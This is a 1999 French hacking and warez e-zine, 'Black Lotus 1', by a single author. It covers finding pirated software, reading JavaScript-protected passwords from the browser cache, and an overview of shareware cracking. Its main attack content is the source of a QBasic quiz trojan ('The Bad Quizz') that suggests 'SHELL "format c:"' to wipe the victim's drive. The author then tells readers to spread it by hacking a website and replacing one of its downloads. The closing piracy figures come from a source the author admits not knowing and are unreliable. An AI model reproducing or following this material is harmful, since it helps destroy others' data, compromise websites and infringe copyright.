Copy Link
Add to Bookmark
Report
Black Lotus 1
ÚÄÄÄ¿ ³ ÚÄÄÄÄ¿ ÚÄÄÄ¿ Ú Ú
³ ³ ³ ³ ³ ³ ³ ³ ÚÙ
ÃÄÄÄÁ¿ ³ ÃÄÄÄÄ´ ³ ÃÂÙ
³ ³ ³ ³ ³ ³ ³ ³ÀÄ¿
ÀÄÄÄÄÙ ÀÄÄÄ À Ù ÀÄÄÄÙ À À
Ü Ü Ü
ÛÛ ÛÛ ßÛÜ
ÜÛÛ ÛÛ ÜÛ
ÛÛ ÛÛÛ ßÛß
Ü ß Ï ß ÏÏ Ü
ÜÛÛÜ ÏÏÏÏÏÏÏ ÛÛÛ
NUMBER ÛÛÛÛÛÜ ÏÏÏÏ ÜÛÛÛÛÛ ONE
ßÛÛÛÛÛÜ ÜÛÛÛÛÛÛ
ßÛÛÛÛÛÜ ÛÛÛÛÛÛÛÛ
ßÛÛÛÛÛÜ ÛÛÛÛÛß
ßÛÛÛÛÛÛ ÛÛß
³ ÚÄÄÄÄ¿ ÚÄÄÂÄÄ¿ Ú ¿ ÚÄÄÄÄ¿
³ ³ ³ ³ ³ ³ ³
³ ³ ³ ³ ³ ³ ÀÄÄÄÄ¿
³ ³ ³ ³ ³ ³ ³
ÀÄÄÄ ÀÄÄÄÄÙ Á ÀÄÄÄÄÙ ÀÄÄÄÄÙ
WaREz - pROgrAMmAtiOn - BiDOuiLlE
YOU MUST SEE THIS DOCUMENT WITH
THE DOS EDIT
ÉÍÍÍÍÍËÍÍÍÍÍÍÍÍÍÍÍÍËÍÍÍÍÍ»
ºBlaCKº DISCLAIMER ºLOtuSº
ÈÍÍÍÍÍÊÍÍÍÍÍÍÍÍÍÍÍÍÊÍÍÍÍͼ
Les textes prsents dans ce mag appartienne
leurs auteurs, vous n'
avez pas le droit de repiquer ces textes pour un autre mag, site web, ou tout autre
support de diffusion. Les textes sont purement ducatifs, et ne m'engage pas
sur la faon dont vous les utiliserez. Je ne peux tre tenu pour responsable
de l'utilisation de ces textes. Ce texte est les infos qui vont suivre sont
lgales, c'est leur mise en pratique qui ne l'est pas.
ÉÍÍÍÍÍËÍÍÍÍÍÍÍÍÍÍËÍÍÍÍÍ»
ºBlaCKº READY??? ºLOtuSº
ÈÍÍÍÍÍÊÍÍÍÍÍÍÍÍÍÍÊÍÍÍÍͼ
Salut les lamers!!! Thanks pour avoir downloader ce zine. Tient, pour
ceux ki l'aurait eu komme a (bah oui koi) Black Lotus est un mag orient
warez/crack/bidouille/programmation, mais en warez, c'est la gamme appz que je
touche, pas de gamez!!!
Pourkoi Black Lotus??? Euh... Ca fait bien ;))) les joueurs de Magic
connaissent surement cette carte, mais pour les autres, Magic The Gathering
est un zeu de carte dont la carte la + chre (2700 boules je crois) et bein
c le Black Lotus, ca coute 0
poser et ca ajoute 2 manas incolores a la
reserve de mana (vous avez rien pig??? c normal :))) J'ai choisi ce nom
paske la carte valant chre, ca veut dire ke Black Lotus est un super mag...
L'ASCII, c moi ki l'ai fait, c du 100% original... C en fait un
plagiat sur le logo du magazine Lotus Noir (mag presse ki parle de Magic)
Pour finir, je crois que Black Lotus est le mag ki contient le mois
fautes d'ortographes!!! Et c pas un mal kan on voit certains e-mags... Ah oui,
si l'kipe de Black Lotus pouvait s'agrandir, ce serait pas un mal (je suis
tout seul) donc, le mail c'est toto.best@wanadoo.fr
Le redac' chef Bubba
ÉÍÍÍÍÍËÍÍÍÍÍÍÍÍÍÍÍÍÍËÍÍÍÍÍ»
ºBlaCKº ZE SOMMAIRE ºLOtuSº
ÈÍÍÍÍÍÊÍÍÍÍÍÍÍÍÍÍÍÍÍÊÍÍÍÍͼ
1>>> Warez? Koi k'c'est??? (la question du lamer) Bubba
2>>> K'est kun lamer??? Bubba
3>>> Trouver du warez on the net Bubba
4>>> Hacker un passwd JavaScript Bubba
5>>> ASCII Bubba
6>>> Le crack de long en large Bubba
7>>> Programmer un BadJoke en Basic Bubba
8>>> C dj
finit! Bubba
ÉÍÍÍÍÍËÍÍÍÍÍÍÍÍÍÍËÍÍÍÍÍ»
ºBlaCKº WAREZ??? ºLOtuSº
ÈÍÍÍÍÍÊÍÍÍÍÍÍÍÍÍÍÊÍÍÍÍͼ
Pour les lamers, voici une bref explication du warez. Vous konnaissez le mot
software? (dans le k contraire, allez voir un dokteur ou allez faire un tout
l'HP ;))) et bien warez est en fait l'abrviation de softwarez. Voil
pour
l'histoire, un warez est un logiciel (un software donc) pirat. Vous chargez
des warez sur Internet alors ke dans le kommerce, vous le payez 6000 boules!
c kan mme interesting no? Il existe plusieurs sortes de warez. Il y a les
appz, qui vient du mot applications (Visual Basic,3D studio Max,...) et les
gamez, ki sont en fait des jeux, sauf ki sont raccourcis (pas de son) afin
de diminuer leur taille. En bref, les gamez, c de la daube, puike vous pouvez
avoir le mme jeu chez vos fournisseurs de CDs gravs :)))
ÉÍÍÍÍÍËÍÍÍÍÍÍÍÍÍÍËÍÍÍÍÍ»
ºBlaCKº LAMER??? ºLOtuSº
ÈÍÍÍÍÍÊÍÍÍÍÍÍÍÍÍÍÊÍÍÍÍͼ
Alors koi k'c'est kun lamer??? Et bein un lamer, c une personne ki pose ce
genre de kestions. :))))
ÉÍÍÍÍÍËÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍËÍÍÍÍÍ»
ºBlaCKº WHERE WAREZ??? ºLOtuSº
ÈÍÍÍÍÍÊÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÊÍÍÍÍͼ
POUR TROUVER DU WAREZ IL VOUS FAUT:
+De la patience (bokoup)
+De l'english (indisp)
+Un aprem ou une nuit devant soit
+Un modem 56k ou un accs Numris
+Une rserve de bouffe IMPORTANTE
+3 ou 4 Playboy pour les temps de chargements
+1 pot de chambre si vos chiottes sont loin du PC
+Un cerveau
+Des yeux
+Des mains (pour taper sur le clavier bande d'obsds)
+Une paire de coui... (Ah tient non c pas necessaire, koi ke pour se branler
devant le Playboy...)
+Et tout autre objet utile
La warez, c bo en thorie, mais faut enkore le trouver sur le Net. Les petits
malins se diront hop! Je tape warez sur mon Yahoo et j'obtiens des cent... 2
rponses!!! Tout de suite: Yahoo c de la DAUBE SUPREME, c pourri, mme la
version originale www.yahoo.com. Trouver du warez, c 'achement simple, vous
allez sur Alta Vista www.altavista.com, vous entrez warez et go!!! Autant vous
prvenir, trouver des sites warez franais au contenu INTERRESSANT, bah c dur,
mme les sites underground en gnral sont nazb, ce sont des sites qui
souvent regorgent de liens ki marchent pas, et des fois -mais c rare- ce sont
des sites au contenu TRES interressant (je ne vous conseillerai jamais assez
www.multimania.com/gripsou et www.multimania.com/shmeitcorp et bien sur, my
home
moi www.multimania.com/utils) en bref en France, c soit un site TRES
BON, soit un site TRES NAZ. Les habitus vont sur le channel warez-france et
rclament une 0day, mais bon, ca c une autre teknik kon verra peut-tre +tard.
Bon, revenons
nos warez :))) donc, la liste de links s'affiche, vous en avez
pour + de 30H
tout visiter. Alors l
vous cliquez sur le premier link ki se
pointe et vous tombez: ERROR 404, This site does not exist HTTP ERROR. Bon et
bah a riske d'tre gai... Et merde, j'ai dj
tout bouff ma rserve en +...
Alors komme un grand, vous vous sortez 2, 3 pakets de trucs
bouffer et vous
retournez sur Alta Vista, 2me link... Ah, a marche!!! Et merde, c un site ki
met 3 ans
charger!!! Putain, j'ai charg 1 image et je me suis tap le
Playboy de long en large!!! Bon, on va puiser dans sa rserve d'images
caractre douteux...
Voil
, c'tait juste pour dire que la recherche de warez et beh c'est pas une
syncure, mais la Crack Team d'Utils Crypte va essayer de faire un site super
complet o on peut downloader du warez, j'ai dj
pas mal de progs sur ma
ouaibe page alors allez y faire un ch'tit tour...
ÉÍÍÍÍÍËÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍËÍÍÍÍÍ»
ºBlaCKº HACKING? JAVA? ºLOtuSº
ÈÍÍÍÍÍÊÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÊÍÍÍÍͼ
>>>THE INTRO<<<
Il existe des mots de passe Java Script facilement hackable. En fait, c
tellement fastoche ke je qualifierai cette teknique (ke j'ai trouv tout seul)
de bidouille plutot ke de hack. En plus, je pense ke c lgal. Pour vous
entrainez, le mag est fourni avec le Java
cracker.
>>>ZE TOOL OF ZE HACK<<<
Pour pirater les input Java, tu dois avoir:
+Internet Explorer 5
+Le bloc-note
+Un oeil (2 c mieux)
+Min une main avec un doigt
>>>FUCK THE JAVA<<<
Allez sur la page
hacker on vous demande le password, la boite de dialogue
Java s'affiche. L
, vous ne pouvez pas faire "affichage/source" pour chercher
le mot de passe dans la source HTML. Mais ce n'est pas grave, puisque qu vous
avez charg la page, vous devez forcment la trouver dans un dossier
temporaire, ce n'est pas C:\windows\temp mais un dossier particulier
IE5, il
se trouve
C:\Windows\temporary internet files\content ie5. Dans ce dossier,
toutes les pages que vous avez vu sur Internet sont copis. Recherchez dans
cette jungle de HTML, de GIF et de JPG ladite page. Gnralement, si c'est la
dernire page que vous avez consult, le fichier se trouve "tout en bas" du
dossier. Imaginons que la page s'appelle password.html, allez dans le bloc-
note, et ouvrez le fichier password.html. Recherche la chaine if (pw == "code").
Dans cet exemple, le mot de passe est code. Retournez sur Internet et tapez le
zenti mot de passe... Et voil
un accs
un site interdit en +...
>>>ZE CONCLUSION<<<
Microsoft Internet Explorer 5 a encore amlior sa protx, mais c pas encore au
point (c mme trs loins de l'tre)
ÉÍÍÍÍÍËÍÍÍÍÍÍÍËÍÍÍÍÍ»
ºBlaCKº ASCII ºLOtuSº
ÈÍÍÍÍÍÊÍÍÍÍÍÍÍÊÍÍÍÍͼ
L'ASCII, c'est super chouette!!! C avec a que j'ai fait le logo de BL.
Donc, pour faire ces diffrents effets, vous faites alt+un numro.
Voici lesdit numros
-POUR DESSINER:
176:° 177:± 178:² 219:Û 220:Ü 223:ß 2: 10:
-TRACER:
179:³ 180:´ 217:Ù 218:Ú 221:Ý 191:¿ 192:À 193:Á 194:Â
195:Ã 196:Ä 197:Å 28: 170:ª
-TRACER (BIS):
200:È 201:É 185:¹ 186:º 187:» 188:¼ 202:Ê 203:Ë 204:Ì
205:Í 206:Î
-OTHER:
184:¸ 189:½ 190:¾ 207:Ï 208:Ð 222:Þ 198:Æ 199:Ç 21:
29: 30: 31: 145: 156: 157: 166:¦ 167:§
174:® 175:¯ 11: 14: 15: 17: 20: 127: 157:
168:¨ 169:© 171:« 172:¬ 173: 189:½ 190:¾ 230:æ
231:ç 232:è
ÉÍÍÍÍÍËÍÍÍÍÍÍÍÍÍÍËÍÍÍÍÍ»
ºBlaCKº CRACKING ºLOtuSº
ÈÍÍÍÍÍÊÍÍÍÍÍÍÍÍÍÍÊÍÍÍÍͼ
Cet artcle a t trouv sur un nø de PrograZine, c'est un mag qui
parle de programmation, et n'est aucunement orient H/C/P/V. Que vient foutre
cet article dans Black Lotus alors??? Et bien les lamers du crack vont
apprendre pleins de trucs!!! C de la thorie, mais il faut a avant la
pratique ;))) Crackers initis et suprieur, passez votre chemin.
Un (vrai) pirate est quelqu'un qui voudrait faire circuler la vraie
information à tout le monde et d'une manière gratuite. En gros, le pirate
pense que tous les logiciels sont des sources d'informations. Il les
distribue donc à toutes ces connaissances gratuitement. Normalement, un bon
pirate ne devrait jamais, même s'il le peut, détruire ou modifier un bien qui
ne lui est pas propre. Par exemple les pirates de réseau ne devraient pas
foutre en l'air un site par simple plaisir. Par contre, il ne se génera pas
pour récupérer toutes les informations qu'il pourrait y trouver.
Voilà, ça a l'air simple, mais les auteurs de logiciels voyant qu'ils
ne vendaient aucun de leurs logiciels et que 90% d'entres eux étaient
simplement copiés sur disquette, les programmeurs ont inventés pleins de
méthodes de protection contre la copie (c'est asez normal). Mais les très bon
pirates sont aussi de très bons programmeurs et vice-versa. Les pirates
réussissent donc à percer le secret de protection des logiciels (on dit alors
que le pirate "cracke" le logiciel). Résultat: des protections de plus en plus
dures à percer.
Bon, je ne suis sûrement pas là pour vous apprendre à déplomber les
logiciels, ce serait illégal, et la vie de PrograZine serait en jeu. Cet
article a été fait à la demande d'un lecteur qui pensait que ce serait bien
de savoir comment les pirates s'y prennent, sans entrer dans les détails.
>>>LES METHODES DE CRACKING<<<
En ce moment, une catégorie de logiciels a pris une place très
importante en micro-informatique: les sharewares (que je regroupe avec les
freewares).
Le programmeur inconnu vient d'écrire un programme qu'il trouve bien
et voudrait le commercialiser. Il veut donc se faire connaitre et montrer de
quoi est capable son programme. Il va donc sortir son programme en version
limitée pour que l'utilisateur puisse se faire une idée des possibilités de
son logiciel.
En fait, dans la plupart des sharewares, les logiciels sont fournis
en version complète!! eh oui. Seulement cette version complète n'est pas
accessible directement. Et c'est ces versions complètes que le pirate essaie
de dénicher.
Il faut savoir qu'il n'y a pas 36 possibilités de proposer des
versions limitées:
- les limites dans le temps: le logiciel ne sera utilisable que
pendant 15 jours par exemple. Mais les programmes sont livrés en
version complète. Cette sécurité est la moins sûre. Il suffirait de
faire croire au logiciel qu'il est toujours la même date. Sur certains
logiciels, n'importe qui sachant se servir de l'horloge sous DOS ou sous
Win pourrait déplomber le logiciel ...
- les limites dans le nombre d'utilisation: Le programme ne sera
utilisable que 10 fois par exemple. D'un point de vue interne, le
programme va forcément noter une valeur à un endroit du disque
(souvent les fichiers systèmes de Win) et incrémenter cette valeur à
chaque utilisation. La méthode de déplombage n'est, encore une fois,
pas très dure. Il suffit de trouver un programme qui note toute l'
arborescence du disque dur avant et après chaque utilisation (en temps
normal, c'est utilisé pour la desinstallation des logiciels).
- les protections par code: Le programme sera en version d'essai et il
sera attribué un numéro différent à chaque shareware. Au moment du
paiement, l'utilisateur reçoit une clé permettant d'activer la version
complète du logiciel. L'idée est donc de faire comme si on avait payé.
La méthode d'obtention de la clé est très différente suivant les cas:
soit on vous demande d'allez chercher la clé parmis une base de données
Minitel, soit l'auteur vous envoie la clé. Mais dans les deux cas, le
programme va vous demander votre clé de paiement. Il ne le vous dit
pas forcément, mais il compare cette clé au numéro d'identification du
shareware, si les numéros sont les mêmes, c'est bon, la version
complète est activée. Evidemment, c'est un peu simplifié, en général,
un fichier du disque va avoir quelquepart parmis ces nombreux octets,
3 ou 4 octets qui représentent le numéro interne du shareware, avec pas
loin, la bonne clé. Evidemment, la plupart du temps, ces informations
sont codées.
Le pirate va donc essayer de décoder ces informations. La, chacun a sa
méthode, mais la plus générale, c'est de "débugger" le programme. Ca vous
parait peut-être bizarre, tous les sharewares ne sont pas vendus par mico$oft,
pourquoi bogueraient-ils ?
En fait, il ne bogue pas (enfin, plus ou moins). Mais un débugger est
un programme qui permet de savoir ce que fait exactement le programme à chaque
instant. Bien sûr, il faut s'y connaître un peu, car le débugger vous dit ce
que fait le programme, mais en assembleur !! donc, faut s'accrocher.
Le pirate va donc faire défiler des millions de lignes de codes pour
finalement s'arreter à deux ou trois instructions qui controlent la procédure
de codage. Une fois cette procédure trouvée, il va falloir modifier le fichier
éxecutable pour dire au programme (toujours en assembleur), de sauter la
vérification. C'est une manière radicale, mais pas très "propre".
La deuxième méthode est donc de ne pas toucher au programme éxecutable
et de noter comment est codée la clé. En trouvant l'algorithme de codage,
le pirate pourra trouver la clé gratuitement. Comme ça, le programme sera en
version complète, proprement. Mais c'est une méthode très difficile.
La seconde méthode consiste à désassembler le programme. C'est assez
similaire au debugage, mais ça marche pour tous les programmes, contrairement
au débugage qui est parfois stoppé par le programme. Une fois la partie d'
algorithme de codage trouvée, il faut la rechercher et le modifier dans le
fichier executable.
Pour les programmes limités dans le temps, il faut faire croire au
logiciel, que c'est toujours le même jour qu'on l'execute. La plupart du temps,
il suffit de noter la date lors de l'installation et de toujours la remettre
avant chaque utilisation (ou rendre ça automatique par un programme). Un
programme universel a été écrit pour ces genres de protections: DateCracker.
Je ne vous direz pas où le trouver, mais sachez que ça existe.
Pour cracker les sharewares limités dans le nombre d'utilisation, il
faut procéder un peu comme quand on met des vies infinies dans les jeux avec
Game Wizard par exemple. On scanne tout le disque, en notant la taille des
fichiers et le contenu des plus importants (WINDOWS\*.INI, fichiers cachés, ...)
On installe ensuite le logiciel, puis on refait un scanne après chaque
éxecution pour voir ce qui a changé. De la sorte, on pourra isoler une partie
d'un fichier (un nombre par exemple) qui s'incrémente à chaque utilisation. Il
suffira après de noter le nombre d'origine à chaque éxecution pour faire
croire que c'est toujours la première fois.
C'est une méthode assez lourde, c'est pourquoi il vaut mieux utiliser des
désinstalleurs qui font le boulot de scan du disque. Une autre méthode
consisterait à chercher dans le fichier éxecutable du logiciel, tous les noms
de fichiers. Peut-être pourrait-on trouver le nom du fichier de protection.
Helas (?), bien souvent les fichiers éxecutables sont compréssé, ce qui fait
qu'on ne peut pas voir les chaines de caractères en clair.
Mais, pour décomprésser ces programmes, et donc voir toutes les
informations en clair (ou presque), il existe de nombreux programme qui
reconaissent la plupart des algo de compression de fichier .EXE (PkLite,
etc ...): UNP par exemple.
Pour tous les autres logiciels, ça se corse. Chaque logiciel ayant sa
méthode de protection, il n'y a pas grand chose de général. Mais il y a quand
même des protections "classiques":
- les protections par disquettes "incopiables": le logiciel est
distribué sur disquette et ne veut s'installer qu'à partir des
disquettes sources. En fait, une simple copie (COPY du DOS par
exemple) ne suffit pas. Il faut copier PHYSIQUEMENT la disquette
source, pour que le logiciel ne voit aucune différence. Ce type de
protection n'est plus beaucoup utilisé.
- les protections par dongle: le logiciel a besoin d'un petit bidule
qui se branche sur le port parallèle du PC juste pour dire qu'on a
acheté ce logiciel. Ce petit bidule envoit en fait constamment le même
code au PC. Pour cracker cette protection, il faut cherche le bout de
programme qui accède au port parallèle et enlever le test.
- les protections par CD: très à la mode en ce moment, le logiciel ne
vaut démarrer que si il trouve le CD original. Même chose que pour les
disquettes, mêmes si on recopie tout le CD (faut déjà avoir pas mal de
place), il manque toujours quelque chose. Tous les CDs contiennent une
zone d'information propre qui renseigne sur le nom du CD, le
fournisseur, etc ... Cette zone n'est accessible que si le programeur
passe par les routines de gestion des CDs. Pour cracker ces logiciels,
il faut simuler la présence du vrai CD en récupérant cette fameuse
zone d'information sur le CD original. Un logiciel qui s'appelle CD
Cracker fait cela. Bien sûr, il reste toujours les methodes radicales
qui consistenet à tout désassembler et regarder gentillement et
lentement chaque bout de programme, mais c'est pratiquement impossible
dans 95% des cas. (essayez de désassembler Quake !!).
>>>LES OUTILS DU CRACKER<<<
- d'assez bonnes connaissances de l'assembleur et du hardware de sa
machine.
- un très bon logiciel de débugging: SoftIce sur PC.
- un très bon désassembeur: IDA sur PC.
- un décomprésseur de fichiers éxecutables (car certains éxecutables
sont compréssés et décompréssés seulement lors de l'éxecution): UNP
(ou autres)
- une connaissance de quelques sites-clés sur Internet: FTP-SEARCH par
exemple.
- beaucoup d'astuces, de chance et de patience ... :)
ÉÍÍÍÍÍËÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍËÍÍÍÍÍ»
ºBlaCKº UN BAD JOKE EN QBASIC ºLOtuSº
ÈÍÍÍÍÍÊÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÊÍÍÍÍͼ
>>>ZE INTRO<<<
Bon, dans ces lignes, je vais vous refiller le code source avec doc et tout de
The Bad Quizz 1.0, c'est un prog que j'ai fait en QBasic, vous aurez donc
besoin de QuikBasic si vous voulez le compiler. Mais d'abord, koi k'c'est kun
Bad Joke??? Un bad joke est une race de virii. C en fait un quizz, si le PD
qui execute le programme rpond mal, le bad joke fait des conneries, si c bon,
on passe
la question suivante. Ce type de virus peut tre affreusement
mchant, et en plus, les antivirus ne les dtectent pas. Seul dfaut, il ne
se reproduit pas de lui-mme. Je crois qu'il existe des progs pour qu'ils se
reproduisent tout seul, mais dans ce cas, vous dites adieu
l'indetectabilit
de l'antivirii. Quand vous voyez "REM ici code qui fait des conneries", vous
devez mettre qq commandes QBasic qui effacent tel ou tel fichier par exemple.
Si
la dernire question, vous voulez faire un formattage du lecteur, vous
mettez: SHELL "format c:" et le tour est jou!!!
>>>ZE SOURCE WITH DOC<<<
Zou, c parti...
REM The Bad Quizz v1.0
REM Ce prog va bouffer ton PC!
CLS
PRINT " "
COLOR 2
PRINT "*************** *************"
PRINT "*The Bad Quizz* *Version 1.0*"
PRINT "*************** *************"
PRINT ""
COLOR 7
PRINT "The Bad Quizz est un questionnaire sympathique avec des questions"
PRINT "marrante. Amusez-vous bien... Et faites pter le score!"
PRINT ""
SHELL "pause"
REM debut question1
PRINT ""
CLS
SOUND 200, 3
SOUND 250, 3
SOUND 300, 3
SOUND 500, 3
SOUND 100, 9
COLOR 2
PRINT " **************"
PRINT " *QUESTION nø1*"
PRINT " **************"
PRINT ""
DIM q1 AS INTEGER
COLOR 7
PRINT "Quel est l'homme politique le plus con de la terre?"
PRINT ""
PRINT "1- LePen"
PRINT "2- Chirac"
PRINT "3- Voisnet"
PRINT ""
INPUT "Votre choix >"; q1
IF q1 = 1 THEN
PRINT "Selon vous, l'homme politique le plus con de la terre est"; q1
PRINT "Vous avez totalement raison!"
PRINT ""
PRINT "OK, maintenant, la question 2"
PRINT ""
SHELL "pause"
ELSE
PRINT ""
PRINT "Rat!!! C'tait LePen!!!"
PRINT "Ton PC va manger!"
REM ici, code faisant une connerie
SHELL "pause"
END IF
REM question2
PRINT ""
CLS
SOUND 200, 3
SOUND 250, 3
SOUND 300, 3
SOUND 500, 3
SOUND 100, 9
COLOR 2
PRINT " **************"
PRINT " *QUESTION nø2*"
PRINT " **************"
PRINT ""
DIM q2 AS INTEGER
COLOR 7
PRINT "Selon vous, quelle est la pire des choses qui puisse vous arriver"
PRINT ""
PRINT "1- La mort de votre belle-mre"
PRINT "2- Le crash de votre voiture"
PRINT "3- Une augmentation des tarifs France Telecon"
PRINT ""
INPUT "Votre choix >"; q2
IF q2 = 3 THEN
PRINT "Je suis TOTALEMENT d'accord! Bravo!"
PRINT ""
PRINT "OK, maintenant, la question 3"
PRINT ""
SHELL "pause"
ELSE
PRINT ""
PRINT "Mais non, c'est l'augmentation des tarifs France Telecon!"
PRINT "C'tait vraiment pas dur..."
PRINT "Ton PC va souffrir"
PRINT ""
REM ici, code faisant des conneries
SHELL "pause"
END IF
REM dbut question3
PRINT ""
CLS
SOUND 200, 3
SOUND 250, 3
SOUND 300, 3
SOUND 500, 3
SOUND 100, 9
COLOR 2
PRINT " **************"
PRINT " *QUESTION nø3*"
PRINT " **************"
PRINT ""
DIM q3 AS INTEGER
COLOR 7
PRINT "Si vous aviez un fusil charg, sur qui tireriez-vous en premier?"
PRINT ""
PRINT "1- Votre belle-mre (encore!!!)"
PRINT "2- Le PDG France Telecon"
PRINT "3- LePen"
PRINT ""
INPUT "Votre choix >"; q3
IF q3 = 2 THEN
PRINT "Je suis TOTALEMENT d'accord! Bravo!"
PRINT ""
PRINT ""
SHELL "pause"
ELSE
PRINT ""
PRINT "Dommage!"
PRINT ""
PRINT "Si vous avez rpondu LePen, c'est vrai... Mais celui l
, vous lui"
PRINT "rglerez son compte plus tard"
PRINT "Ton PC va souffrir"
PRINT ""
REM ici, code faisant des conneries
SHELL "pause"
END IF
COLOR 2
CLS
PRINT "Ce quizz est finit."
PRINT "J'espre pour vous que vos rponses taient bonnes..."
PRINT "Ce que j'ai pas dit, c'est que TheBadQuizz est un Bad Joke"
PRINT "Si votre PC ne redmarre pas, c'est normal :-))))))"
PRINT ""
PRINT " TU VIENS DE SUBIR UN VIRUS"
PRINT " TU T'ES FAIT BAISE PAR UN"
PRINT " PROG ECRIT PAR BUBBA!"
PRINT ""
COLOR 4
PRINT "Tu as peut-tre subit l'effacement de tes fichiers systmes,"
PRINT "alors, vrifie bien avant d'teindre ton PC que rien ne manque,"
PRINT "car sinon, le crash total sera irrmdiable!"
PRINT ""
PRINT "Je t'ai eu sale con, tu t'es fait bais en beaut!"
SHELL "pause"
END
>>>DISTRIBUTE THIS VIRII<<<
Maintenant que le prog est fait, va falloir le diffuser sur les PCs des autres
Pour cela, la meilleur technique pour moi:
Reprer dans un site que vous n'aimez pas un zip
charger.
Zippez le programme TheBadQuizz et renommer le zip pareil
celui du site.
Hackez le site web en remplaant le zip sur le site par TheBadQuizz.
Et voil
!
ÉÍÍÍÍÍËÍÍÍÍÍÍÍÍÍÍÍÍËÍÍÍÍÍ»
ºBlaCKº THE FINISH ºLOtuSº
ÈÍÍÍÍÍÊÍÍÍÍÍÍÍÍÍÍÍÍÊÍÍÍÍͼ
Pour finir, voici kk chiffres:
Taux de piratage:
( Utilisation de copies illgales )
France 62%
Chine 98%
Russie 95%
Thalande 92%
USA 25%
Pologne 81%
Espagne 76%
Canada 25%
Sur mon PC 99,99999999%
Source: je sais pas d'o k'sa vient
Evidemment, les chiffres sont grossis; genre 98% en Chine, euh... Ca fait
bokoup koi... Sur mon PC, si c 99,99999999%, et pas 100%, c paske Win95
tait fourni avec le PC. Bien sur, je tourne maintenant avec une kopie de 98..
Mme mon assembleur me refourgue du warez (si si!!!) j'ai eu Works 4 et Office
gratos!!!
Donc vala koi... Si kkun veut se joindre
Black Lotus, c OK!!!
Copyright Bubba 1999 (c) (r) & TM
toto.best@wanadoo.fr
www.multimania.com/utils